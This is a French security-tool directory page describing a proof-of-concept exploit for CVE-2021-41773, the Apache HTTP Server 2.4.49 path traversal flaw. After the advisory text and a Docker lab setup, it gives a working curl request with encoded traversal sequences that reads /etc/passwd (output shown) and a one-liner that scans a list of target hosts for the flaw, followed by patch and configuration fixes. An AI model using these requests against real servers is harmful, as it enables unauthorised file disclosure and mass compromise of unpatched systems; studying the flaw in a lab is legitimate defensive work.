Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41773 — Exploit de preuve de concept pour la vulnérabilité de traversée de chemin Apache HTTP Server 2.4.49 (CVE-2021-41773) avec configuration Docker et plusieurs méthodes d'exploitation pour la divulgation de fichiers. | Kitploit
Outils/GitHubGitHub/jbovet/cve-2021-41773
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubjbovet/cve-2021-41773

CVE-2021-41773

Exploit de preuve de concept pour la vulnérabilité de traversée de chemin Apache HTTP Server 2.4.49 (CVE-2021-41773) avec configuration Docker et plusieurs méthodes d'exploitation pour la divulgation de fichiers.

Voir le dépôt
431il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41773

Vulnérabilité de traversée de chemin et de divulgation de fichiers dans Apache HTTP Server 2.4.49 (CVE-2021-41773)

Informations

Une faille a été trouvée dans une modification apportée à la normalisation des chemins dans Apache HTTP Server 2.4.49. Un attaquant pourrait utiliser une attaque de traversée de chemin pour mapper des URL vers des fichiers en dehors du répertoire racine attendu.

Si les fichiers situés en dehors du répertoire racine ne sont pas protégés par "require all denied", ces requêtes peuvent réussir. De plus, cette faille pourrait divulguer le code source de fichiers interprétés comme les scripts CGI.

Ce problème est connu pour être exploité dans la nature.

Ce problème n'affecte qu'Apache 2.4.49 et non les versions antérieures.

Remerciements : Ce problème a été signalé par Ash Daulton avec l'équipe de sécurité de cPanel

Signalé à l'équipe de sécurité 2021-09-29 Corrigé par r1893775 dans 2.4.50 2021-10-01 Mise à jour 2.4.50 publiée 2021-10-04 Affecte 2.4.49

POC

root@kitploit:~
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773

Vérifier que ça fonctionne

root@kitploit:~
$ curl -I http://localhost
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 13:25:18 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
ETag: "2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html

Exploit 1

root@kitploit:~
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

Sortie

root@kitploit:~
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
utmp:x:100:406:utmp:/home/utmp:/bin/false

Exploit 2

root@kitploit:~
cat targets | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

Sortie

root@kitploit:~
root:x:0:0:root:/root:/bin/ash
operator:x:11:0:operator:/root:/sbin/nologin
localhost Vulnerable

Comment corriger

  1. Mettre à jour Apache HTTP Server 2.4.50 publié le 2021-10-04
  2. Refuser et modifier ce qui suit dans le fichier de configuration d'Apache2 :
root@kitploit:~
<!-- Vulnerable (Require all granted in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all granted
</Directory>

<!-- Patched (Require all denied in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all denied
</Directory>

Références

  • https://httpd.apache.org/security/vulnerabilities_24.html
Télécharger l’outil